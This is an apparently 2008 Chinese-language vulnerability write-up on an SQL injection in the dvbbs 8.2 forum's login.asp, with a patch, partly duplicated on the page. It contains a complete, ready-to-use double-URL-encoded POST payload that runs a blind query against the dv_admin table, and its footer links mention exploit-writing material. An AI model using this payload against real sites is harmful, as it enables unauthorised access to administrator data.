dvbbs 8.2 SQL Injection注射漏洞分析
更新時(shí)間:2008年05月31日 12:19:06 作者:
利用方式:一個(gè)典型的sql注射漏洞,按照公告里說(shuō)的用
password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271
就可觸發(fā).
漏洞分析:動(dòng)網(wǎng)在asp領(lǐng)域也算一個(gè)比較元老的程序,這次在8.2新版里有一個(gè)低級(jí)的錯(cuò)誤.漏洞代碼在login.asp 118行左右
......
username=trim(Dvbbs.CheckStr(request("username")))
If ajaxPro Then username = unescape(username)
......
取得的username是先經(jīng)過(guò)檢查然后再unescape解碼,導(dǎo)致用urlencode模式就可以饒過(guò)任何檢查,和php的urldecode導(dǎo)致的注射很類似,譬如用%2527就可以提交'過(guò)去了.
修補(bǔ)方案:修補(bǔ)也很簡(jiǎn)單,將上述代碼改成
......
username=trim(Dvbbs.CheckStr(request("username")))
If ajaxPro Then username = trim(Dvbbs.CheckStr(unescape(username)))
......
就可觸發(fā).
漏洞分析:動(dòng)網(wǎng)在asp領(lǐng)域也算一個(gè)比較元老的程序,這次在8.2新版里有一個(gè)低級(jí)的錯(cuò)誤.漏洞代碼在login.asp 118行左右
......
username=trim(Dvbbs.CheckStr(request("username")))
If ajaxPro Then username = unescape(username)
......
取得的username是先經(jīng)過(guò)檢查然后再unescape解碼,導(dǎo)致用urlencode模式就可以饒過(guò)任何檢查,和php的urldecode導(dǎo)致的注射很類似,譬如用%2527就可以提交'過(guò)去了.
修補(bǔ)方案:修補(bǔ)也很簡(jiǎn)單,將上述代碼改成
......
username=trim(Dvbbs.CheckStr(request("username")))
If ajaxPro Then username = trim(Dvbbs.CheckStr(unescape(username)))
......
相關(guān)文章
一些通用跳轉(zhuǎn)地址,XXOXX的時(shí)候有點(diǎn)用
近日在寫exploit的時(shí)候需要用到一些其他語(yǔ)言的call ebx的跳轉(zhuǎn)地址,但是metasploit的opcode DB沒(méi)有包括繁體中文、日文、韓文機(jī)器的跳轉(zhuǎn)地址,所以費(fèi)了點(diǎn)時(shí)間收集了下,在這里要感謝傲少提供的機(jī)器給我去找地址?,F(xiàn)在貼到這里,方便大家。2008-09-09創(chuàng)建c:\con.txt嗎?windows文件系統(tǒng)漏洞
2008-01-01入侵ASP.net網(wǎng)站的經(jīng)驗(yàn)附利用代碼
愛(ài)好入侵的可以用下面的方法,做網(wǎng)站的朋友就需要了解下面的asp.net的利用代碼,最好來(lái)測(cè)試下2008-06-06